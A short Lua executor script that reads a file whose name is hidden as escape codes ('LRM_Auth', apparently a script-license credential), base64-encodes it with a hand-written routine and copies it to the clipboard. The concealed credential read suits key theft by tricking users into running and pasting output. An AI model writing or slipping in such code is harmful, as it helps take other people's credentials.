local _r=readfile
local _c=setclipboard

local _s=_r("\76\82\77\95\65\117\116\104")

local _k="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
local function _e(_d)
    local function _b(_x)
        local _o=""
        local _n=_x:byte()
        for _i=8,1,-1 do
            _o=_o..((_n%2^_i-_n%2^(_i-1)>0) and "1" or "0")
        end
        return _o
    end

    local _p=(_d:gsub(".",_b).."0000"):gsub("%d%d%d?%d?%d?%d?",function(_m)
        if #_m<6 then return "" end
        local _v=0
        for _j=1,6 do
            _v=_v+((_m:sub(_j,_j)=="1") and 2^(6-_j) or 0)
        end
        return _k:sub(_v+1,_v+1)
    end)

    local _pad={ "", "==", "=" }
    return _p.._pad[#_d%3+1]
end

_c(_e(_s))
